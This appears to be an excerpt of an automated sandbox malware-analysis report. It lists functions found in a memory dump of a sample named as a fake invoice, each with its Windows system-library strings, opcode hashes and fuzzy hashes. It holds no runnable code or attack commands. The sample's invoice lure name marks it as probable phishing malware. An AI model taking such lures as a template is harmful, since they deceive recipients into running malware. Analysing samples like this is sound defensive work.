                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: d01e2aab7ec6eacc6b1bba5f1b309746e474378004cacbcab61dcc5cb48e81f9
                                  • Instruction ID: 3caf99f2b12f510f71898d5a90fee1a7080433e9580473cfa30c26f5621e7ce5
                                  • Opcode Fuzzy Hash: d01e2aab7ec6eacc6b1bba5f1b309746e474378004cacbcab61dcc5cb48e81f9
                                  • Instruction Fuzzy Hash: D9A16D719112299BDB31DF68CD88BEAB7B8EF48710F1141EAEA09A7250D7359E84CF50
                                  Function 01A30BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpCheckModule, xrefs: 01A7A117
                                  • Failed to allocated memory for shimmed module list, xrefs: 01A7A10F
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A7A121
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  • Opcode ID: b7306ceee061ac17227b3256988e8c143ae2348d412e40e92c8ec164f8afeb1a
                                  • Instruction ID: d5e5d7b1ab40bf3eccf5754cf1f495894cca087c10999cafabf8ab0bbecbf34c
                                  • Opcode Fuzzy Hash: b7306ceee061ac17227b3256988e8c143ae2348d412e40e92c8ec164f8afeb1a
                                  • Instruction Fuzzy Hash: D771AD71A00205EFDB2ADF68CA85BBEB7F4EB94704F18442DE906D7255E734AA42CB50
                                  Function 01A4C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  • Failed to reallocate the system dirs string !, xrefs: 01A882D7
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A882E8
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 01A882DE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: 8c54e82e59b44ca256e12d34efdda2a148c7b8f86667962b6a4128122ec5c612
                                  • Instruction ID: efac098134c11874b525b7b97f3e19c70d397ccfa460d972d4a61a489540aec6
                                  • Opcode Fuzzy Hash: 8c54e82e59b44ca256e12d34efdda2a148c7b8f86667962b6a4128122ec5c612
                                  • Instruction Fuzzy Hash: 61413471545301ABD732EB68DD40B9B7BE8EFA8760F00452AF94CD32A5EB74D800CB91
                                  Function 01ACC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 01ACC1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01ACC1C5
                                  • PreferredUILanguages, xrefs: 01ACC212
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: a763fdd7ad7579941eec4323628a19b03ad22f606aff5d9f6f7fb4fb39b49d06
                                  • Instruction ID: 16bd3d38b17137f98bf6e0ecf6ceae0d5fd619bb681261ef49c83c5a972cf787
                                  • Opcode Fuzzy Hash: a763fdd7ad7579941eec4323628a19b03ad22f606aff5d9f6f7fb4fb39b49d06
                                  • Instruction Fuzzy Hash: 32416272E00219EBDF11EBD8C951FEEBBB9AB54B10F14406EEA09B7284D7749A44CB50
                                  Function 01AA4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: b12b2cddb60514ffbd89977ea5a4d57ab0797b62f81a47bae33410f8d7e8469c
                                  • Instruction ID: 3c41bcd2c3920d22e7e3b85f3a496b6f1ef7031d92eaad8e31086517839778e5
                                  • Opcode Fuzzy Hash: b12b2cddb60514ffbd89977ea5a4d57ab0797b62f81a47bae33410f8d7e8469c
                                  • Instruction Fuzzy Hash: C3412671A047588BEB26DBE8C940BADBBF4FF59340F5C046AE901EB382D7B59905CB10
                                  Function 01A94755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpCheckRedirection, xrefs: 01A9488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01A94899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A94888
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: 4f36051fec2813b577d5d47e4567bc1824e1ff3f8c9f3b53c035bb99572ac58c
                                  • Instruction ID: c7098fdaa461e9d9b3e4e1c66db9937fdbb281f328c5ce042ed05a52f9b00140
                                  • Opcode Fuzzy Hash: 4f36051fec2813b577d5d47e4567bc1824e1ff3f8c9f3b53c035bb99572ac58c
                                  • Instruction Fuzzy Hash: AD41E232A047519FCF22CF6DDA40A2A7BE4AF8DA50F09455DED48DB311D730D882CB81
                                  Function 01A20BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 5aced55433e65c327ebc07835fee3b36092834b7800054a33d0354262d7506ba
                                  • Instruction ID: 5e92a13aef06bda1f790158bd1ebf9625f0feaec43c186f2506581591f3dbe11
                                  • Opcode Fuzzy Hash: 5aced55433e65c327ebc07835fee3b36092834b7800054a33d0354262d7506ba
                                  • Instruction Fuzzy Hash: 271103317541129FEB2ACB2CDA84F36B3A6EF50715F18816DF40ACB292DB30E840C750
                                  Function 01A920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • Process initialization failed with status 0x%08lx, xrefs: 01A920F3
                                  • LdrpInitializationFailure, xrefs: 01A920FA
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A92104
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: 851d878823cfa281ee2b4b6d0ed6bb56e8fc081759e5f150882daef36947f200
                                  • Instruction ID: 9e3efbee823daf042f52fb9276b455f41362e261b74121cb113599477df175f7
                                  • Opcode Fuzzy Hash: 851d878823cfa281ee2b4b6d0ed6bb56e8fc081759e5f150882daef36947f200
                                  • Instruction Fuzzy Hash: D3F02274640308BFEB20E70CCD46F997BE8FB90B54F20002DFB0467281E2B0A990CB81
                                  Function 01A203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: bce902ba85b3aca208f2c2b265ffecf65e08da33c35b42da8a08d7b9c0e4158a
                                  • Instruction ID: c2dbea32ecdee890773c3d94eea641fec0f6da875f634faaab972ced45f86677
                                  • Opcode Fuzzy Hash: bce902ba85b3aca208f2c2b265ffecf65e08da33c35b42da8a08d7b9c0e4158a
                                  • Instruction Fuzzy Hash: 7D715971A0015A9FDB01DFA8CA84BAEB7F8FF18744F144065E905E7252EB38EE45CB60
                                  Function 01A1A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrResSearchResource Enter, xrefs: 01A1AA13
                                  • LdrResSearchResource Exit, xrefs: 01A1AA25
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: 7450889f7aaec0b08837ddfdbf2ae15fcf020a4a794adb72bf9e27a0fe9f1b22
                                  • Instruction ID: 996844160f99748d81aa772db44673749a00f6a40c73f469901b2222be437306
                                  • Opcode Fuzzy Hash: 7450889f7aaec0b08837ddfdbf2ae15fcf020a4a794adb72bf9e27a0fe9f1b22
                                  • Instruction Fuzzy Hash: 67E19271E05299AFEF22CF99DE80BAEBBB9FF04310F154426E901E7245D7749941CB50
                                  Function 01ADA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: acbc8f20d9f64a8f839a58054ea8492ace4f7c64acaeece73369d41a99fd51bd
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: 3DC1BF31204B429BEB25CF28C941B6BBBE5AFC4318F084A2DF697CB291D774D505CB81
                                  Function 01A8E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: fad6acccfb92e849fc47537e636eddb475c3298e0b39708141dfbba373fbc476
                                  • Instruction ID: f1f2667aaf7e910e2d92c821b1daed1d9343edb11add3d13e2667eba82fd1d7d
                                  • Opcode Fuzzy Hash: fad6acccfb92e849fc47537e636eddb475c3298e0b39708141dfbba373fbc476
                                  • Instruction Fuzzy Hash: BE6118B1E14219DFDB25EFA9C940BAEBBF9FB48700F14406DEA49EB251D731A940CB50
                                  Function 01AB43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: 1361a7c834188431c6194578666bb7f8063b4273f71b26875b4a465b3e184a96
                                  • Instruction ID: edc0c1dd38cb1315d0f2d9390511245269d70f729ad2c10ace67789de730aac9
                                  • Opcode Fuzzy Hash: 1361a7c834188431c6194578666bb7f8063b4273f71b26875b4a465b3e184a96
                                  • Instruction Fuzzy Hash: 0F510971D0065DAFEF11DFE9CD80AEEBBBCEB48754F10052AEA11A7292D6349D05CB60
                                  Function 01A104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  • kLsE, xrefs: 01A10540
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A1063D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  • Opcode ID: 1d2255ebbdfc440ebc492f0a20be2f06f074435e55823e1234b60696560d86e8
                                  • Instruction ID: 36b377f57b605e93491250e70dfd74eeabdb32af8b198d17ad32164ffcd8bea9
                                  • Opcode Fuzzy Hash: 1d2255ebbdfc440ebc492f0a20be2f06f074435e55823e1234b60696560d86e8
                                  • Instruction Fuzzy Hash: D351AE715047428BD725EF78C6406A7BBE4AF84314F148C3EFAAA87245E770D985CB92
                                  Function 01A1A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 01A1A2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 01A1A309
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 9b5cf7d8af31b5037a8dc7d8453508593dfd3a08e33baa192b1d8cf59f8f6713
                                  • Instruction ID: 49306c7b81775e16ce40b06749fc4926c1c67180453580721e0378acee68170a
                                  • Opcode Fuzzy Hash: 9b5cf7d8af31b5037a8dc7d8453508593dfd3a08e33baa192b1d8cf59f8f6713
                                  • Instruction Fuzzy Hash: 4841CF74A05695DBEB12CF6DC840B6EBBF4FF85700F1880A6E905DB295E3B5DA40CB50
                                  Function 01A4A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: eb47d358c06c79f5ac44a2baa331f5058c66ea33f5d3d8ec7210602b0c09be33
                                  • Instruction ID: 47d64c320ce0f9f7ad9fe927e4fe237bb1d9a61ff44b6f1c78bc87309037d7ac
                                  • Opcode Fuzzy Hash: eb47d358c06c79f5ac44a2baa331f5058c66ea33f5d3d8ec7210602b0c09be33
                                  • Instruction Fuzzy Hash: AA01ADB2284700AFE312DF14CE49B56B7E8E794719F058939E649C7190E774D804CB4A
                                  Function 01A1C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: e9f7b1d525771a4caf8613b37661d9260f14082f4225f961b943e2a3d35a3e1d
                                  • Instruction ID: 3a4aeae569fe86333c0386ce5d2f65a420ab8e3385eacb2005062e07856bb5f0
                                  • Opcode Fuzzy Hash: e9f7b1d525771a4caf8613b37661d9260f14082f4225f961b943e2a3d35a3e1d
                                  • Instruction Fuzzy Hash: B4827B75E402188FEB25CFA9C984BEDBBB5BF48320F148169E919EB299D7309D41CF50
                                  Function 01A96420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 29dc34b51f1db7b898adf2ae5634d26f071bffdbf152450c8fc101b514c72673
                                  • Instruction ID: e43578477ca3c118f7942a63a23d8f5cea8a0d2ca2a7b17f425debaccaef95ba
                                  • Opcode Fuzzy Hash: 29dc34b51f1db7b898adf2ae5634d26f071bffdbf152450c8fc101b514c72673
                                  • Instruction Fuzzy Hash: 98917171900219AFEF21DFA9CD85FAEBBB8EF58750F100025F604AB191D774AD44CBA0
                                  Function 01ABE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: f6cf87494f44d40185ea543634d89c1f5f71958cf2e142fc786236ec1a516316
                                  • Instruction ID: 821624b49d8514c3561540534b59b31b36cb154121e79621258e02476101a933
                                  • Opcode Fuzzy Hash: f6cf87494f44d40185ea543634d89c1f5f71958cf2e142fc786236ec1a516316
                                  • Instruction Fuzzy Hash: B491AE32901689AFDF22ABA4DD84FEFBBBDEF85750F140025F505A7252E7389901CB50
                                  Function 01A4A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  • Opcode ID: c31e549db325531b16968d1e79864417c606391eadffd20187c18959dc4f1135
                                  • Instruction ID: 7689a1fb3a47327e181116627747e7680e06a66109a79f6e9b42777b4c72ddd4
                                  • Opcode Fuzzy Hash: c31e549db325531b16968d1e79864417c606391eadffd20187c18959dc4f1135
                                  • Instruction Fuzzy Hash: 907181B5E0020ADFEF29EF9CD5906EDBBB1BF98710F14812EE509A7245E7349941CB90
                                  Function 01AB4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  • Opcode ID: cec39e37614a18a12a5dabcaa63dc24da928edd1d47c1f035e1b57c00bdb0540
                                  • Instruction ID: 81a43c1323f92f34c32cee3657d25da4c544b1aedb70e740d5b249892b4b01c0
                                  • Opcode Fuzzy Hash: cec39e37614a18a12a5dabcaa63dc24da928edd1d47c1f035e1b57c00bdb0540
                                  • Instruction Fuzzy Hash: 2551B772D002699BDF11DF99D980AEEBBBCBF09614F05412DEA16B7242D3749C01CBE4
                                  Function 01A2E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  • Opcode ID: ccdc74cddb71395cb2b63d699940eb1d783e1638698227874c67d4f3df296ba8
                                  • Instruction ID: 7484d42a953f5cfec805b6c75395343cf4a61e06ab5374a05af8abd9aedb8fb9
                                  • Opcode Fuzzy Hash: ccdc74cddb71395cb2b63d699940eb1d783e1638698227874c67d4f3df296ba8
                                  • Instruction Fuzzy Hash: E141A3726083629BD721DB7DCA40B6BBBE8AF88714F48092DFA84D7180E774D944C793
                                  Function 01A8C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: 1b6bb077cf6d5b575c8df7c2a87114b0f38262e3623badb248db615e4e70f041
                                  • Instruction ID: fe069f9845201d482315ddaeff695d8e49d8298f025f764d97956afbb91cb445
                                  • Opcode Fuzzy Hash: 1b6bb077cf6d5b575c8df7c2a87114b0f38262e3623badb248db615e4e70f041
                                  • Instruction Fuzzy Hash: 104156B1D5012DABDF21EB60CD84FDEB77CAB54724F0045A5EB08AB144DB709E898FA4
                                  Function 01AA6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  • Opcode ID: 67db2610d7d1ad7984dcfcecbcccf775af4a3b06924eca17e92cee700f6a50e0
                                  • Instruction ID: 33459018e3d0694835de21f8cfc4c4fd61320ab64688353650edb334676d4805
                                  • Opcode Fuzzy Hash: 67db2610d7d1ad7984dcfcecbcccf775af4a3b06924eca17e92cee700f6a50e0
                                  • Instruction Fuzzy Hash: 3D312A31A407199BEB22DF69C854BFEBBB8DF45704F984028E958AB282D775D805CF50
                                  Function 01A8CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: 38281c58bac5321ffa57c61e271976afc1b77028ee656fefa65893a0dd4315d1
                                  • Instruction ID: 66ce4c17cf14c0c336451bbbb886b796472924f9332ba1d7543ce557f95cca44
                                  • Opcode Fuzzy Hash: 38281c58bac5321ffa57c61e271976afc1b77028ee656fefa65893a0dd4315d1
                                  • Instruction Fuzzy Hash: D531D176900919AFEB15EB59C949EBBBBB4FB80730F014129E905A7250D7309E04DBE0
                                  Function 01A9892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A9895E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  • Opcode ID: 81bf1ba64baa3ed84023d5c9d0941b64ded16b55bd9a5ecb13fe9f24d86b85ee
                                  • Instruction ID: 3b7ec4a5da78cb8b5c0f968ae9a7c07c2730c42f568166f1bbd1f4fd993f1dbf
                                  • Opcode Fuzzy Hash: 81bf1ba64baa3ed84023d5c9d0941b64ded16b55bd9a5ecb13fe9f24d86b85ee
                                  • Instruction Fuzzy Hash: 90012B32300209AFEF365B56DD88A567FE5FF97654B04001CF64587952CB2468C1CB92
                                  Function 01AB2000 Relevance: .8, Instructions: 757COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef43de011133e96bce7f1897c5e45c6f945d2b9ef619c1c48fa697cb0bdb3766
                                  • Instruction ID: a5fb49528b85222ead07601a953541cf826f7c7c09006a4d6fa2a65025a866bf
                                  • Opcode Fuzzy Hash: ef43de011133e96bce7f1897c5e45c6f945d2b9ef619c1c48fa697cb0bdb3766
                                  • Instruction Fuzzy Hash: 7A42C9716083819BD715CF68C8D07ABBBE9BF88340F08492FFA9697252D774E845CB52
                                  Function 01AA8158 Relevance: .6, Instructions: 617COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 66d5a4d0f9f91d26fc18e2afc1b131fe2ebd69b92e692f600e0b78516dcf768e
                                  • Instruction ID: 6522d755cb4a65d36b135446c56ab2cec178ed3f9aa1cdd063380ab1411c2788
                                  • Opcode Fuzzy Hash: 66d5a4d0f9f91d26fc18e2afc1b131fe2ebd69b92e692f600e0b78516dcf768e
                                  • Instruction Fuzzy Hash: 08425F75E002198FEB25CF69C841BADBBF5BF48301F588199E949EB242D7389D85CF50
                                  Function 01A22840 Relevance: .6, Instructions: 605COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
